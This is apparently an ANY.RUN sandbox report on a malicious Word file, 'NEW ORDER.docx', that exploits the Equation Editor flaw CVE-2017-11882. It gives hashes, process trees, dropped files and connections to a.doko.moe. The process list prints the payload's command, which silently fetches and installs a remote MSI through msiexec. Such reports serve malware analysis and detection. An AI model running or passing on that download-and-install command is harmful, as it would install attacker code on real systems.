analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

NEW ORDER.docx

Full analysis: https://app.any.run/tasks/d892d0e4-3a18-49e4-8e48-ce8edba1b7e8
Verdict: Malicious activity
Analysis date: November 14, 2018, 10:48:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

0CDF66E66C2F18FDCEC511C1BDF41252

SHA1:

D9E948393C873737477612C80988CE521DAE1EC5

SHA256:

84CC492357968CCE6C5692D2D05B7EF0DAB10A53E8201FF8F652BDCC47C7EEB0

SSDEEP:

3072:a7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKpHE:a7lCAdFkYhDFBxvqyRmTMSFmfSz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3284)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2340)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3284)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3568)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3568)

    • Application was crashed

      • EQNEDT32.EXE (PID: 3284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2ea8411c
ZipCompressedSize: 351
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2018:11:06 07:34:00Z
ModifyDate: 2018:11:06 07:34:00Z

XMP

Title: -
Subject: -
Creator: Windows User
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3568"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\NEW ORDER.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3284"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2340cmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/mhyqwy.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1619
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2596msiexec.exe /i https://a.doko.moe/mhyqwy.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3132C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3076"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Total events
1 327
Read events
866
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
24
Text files
8
Unknown types
4

Dropped files

PID
Process
Filename
Type
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR32B3.tmp.cvr
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{333D0C73-56CC-4FD4-A6D8-D12A48F85650}
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{0F93D533-5919-47F1-889C-1E2D01FF3409}
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\44DB00D2.jpeg
MD5:
SHA256:
3568WINWORD.EXEC:\Users\admin\~$W ORDER.docxpgc
MD5:43A82A21610F8F89731FD15A316D8279
SHA256:ACBE8EA4C14867109700FAEB93232772C7DD7D9598068E94E801A4594330D8F4
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:370DA206497600CA81003C687DB73713
SHA256:AA92481A43E8B707C5D7CCABC554281A7BD4940A85AFFFA1B5B71CD7A909BB8F
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{E4BBA9CA-981E-4E16-91C0-ECED2A50D48B}.FSDbinary
MD5:32AC9E4B1EFB971B548B85A612F1A035
SHA256:8D69181F48E915D3141B9AF34799677798DBDE7E734379799957D38AC76BC9D7
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:DD8EAD52DCCA697D84523C74E01FD7F0
SHA256:98CCBBDA88B8DE279487D8B56DD44956FD16075C9D09574F4ED3F18AF26FC2B3
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{E3550006-2EEB-46A2-B6E5-A41FDB3F83AC}.FSDbinary
MD5:4DC475D0667026D58CE8B8CD9640087B
SHA256:1747A80502D845AC394C14247316E2C795ECD1539526A809585F461D68D69B07
3568WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSFbinary
MD5:E7F40C22E53BC53E0C3571625F398BB8
SHA256:621034960E40B2288F274C8F5653DA61B95E5450AF36419BEE38E063A4A2A70D
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3568
WINWORD.EXE
185.83.214.16:443
a.doko.moe
PT
suspicious
964
svchost.exe
185.83.214.16:443
a.doko.moe
PT
suspicious
3132
msiexec.exe
185.83.214.16:443
a.doko.moe
PT
suspicious

DNS requests

Domain
IP
Reputation
a.doko.moe
  • 185.83.214.16
unknown

Threats

Found threats are available for the paid subscriptions
7 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
NEW ORDER.docx